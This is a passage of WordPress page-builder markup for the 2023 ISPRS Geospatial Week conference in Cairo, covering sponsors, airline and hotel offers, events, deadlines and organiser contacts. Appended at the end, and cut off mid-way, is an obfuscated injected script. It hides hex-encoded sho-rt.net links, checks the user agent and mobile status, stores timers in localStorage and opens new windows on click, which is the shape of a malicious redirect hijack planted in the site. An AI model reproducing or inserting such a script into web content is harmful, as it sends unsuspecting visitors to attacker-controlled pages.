/>\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'34